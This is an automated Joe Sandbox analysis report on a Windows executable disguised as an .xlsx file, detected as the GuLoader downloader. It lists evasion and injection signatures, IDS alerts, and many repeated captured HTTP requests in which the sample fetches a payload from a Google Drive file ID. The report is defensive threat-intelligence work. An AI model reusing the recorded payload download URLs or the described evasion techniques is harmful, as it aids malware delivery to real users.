Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
09-FD-94.03.60.175.07.xlsx.exe

Overview

General Information

Sample name:09-FD-94.03.60.175.07.xlsx.exe
Analysis ID:1576274
MD5:321a9608e5bf03bf63f4574d0df1a380
SHA1:71c523fc14b83e0c8d5eac9bcc61c9487c1f2dfd
SHA256:c113d227b647a1a61b1f9f6c5350a25a43acc26960ef9d9b1a3c5e80e68d75f0
Tags:exeuser-Racco42
Infos:

Detection

GuLoader
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Sigma detected: Suspicious Double Extension File Execution
Yara detected GuLoader
AI detected suspicious sample
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.2751336924.0000000004A43000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000000.00000002.1600421494.0000000007ED3000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

      Sigma Signatures

      System Summary

      barindex
      Sigma detected: Suspicious Double Extension File Execution
      Source: Process startedAuthor: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe", CommandLine: "C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe, NewProcessName: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe, OriginalFileName: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe", ProcessId: 3232, ProcessName: 09-FD-94.03.60.175.07.xlsx.exe

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-16T17:57:42.262363+010028032702Potentially Bad Traffic192.168.2.849709172.217.19.174443TCP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Multi AV Scanner detection for submitted file
      Source: 09-FD-94.03.60.175.07.xlsx.exeReversingLabs: Detection: 55%
      AI detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
      Source: 09-FD-94.03.60.175.07.xlsx.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.8:49709 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.8:49711 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.8:49712 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.8:49721 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.8:49725 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.8:49727 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.8:49758 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.8:49771 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.8:49783 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.8:49793 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.8:49800 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.8:49806 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.8:49812 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.8:49856 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.8:49869 version: TLS 1.2
      Source: 09-FD-94.03.60.175.07.xlsx.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeCode function: 0_2_004057D0 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,0_2_004057D0
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeCode function: 0_2_0040628B FindFirstFileW,FindClose,0_2_0040628B
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeCode function: 0_2_00402770 FindFirstFileW,0_2_00402770
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeCode function: 2_2_00402770 FindFirstFileW,2_2_00402770
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeCode function: 2_2_004057D0 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,2_2_004057D0
      Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exeCode function: 2_2_0040628B FindFirstFileW,FindClose,2_2_0040628B
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49709 -> 172.217.19.174:443
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
      Source: global trafficHTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
      Source: global trafficHTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
      Source: global trafficHTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
      Source: global trafficHTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
      Source: global trafficHTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
      Source: global trafficHTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
      Source: global trafficHTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
      Source: global trafficHTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
      Source: global trafficHTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
      Source: global trafficHTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
      Source: global trafficHTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
      Source: global trafficHTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
      Source: global trafficHTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
      Source: global trafficHTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
      Source: global trafficHTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
      Source: global trafficHTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
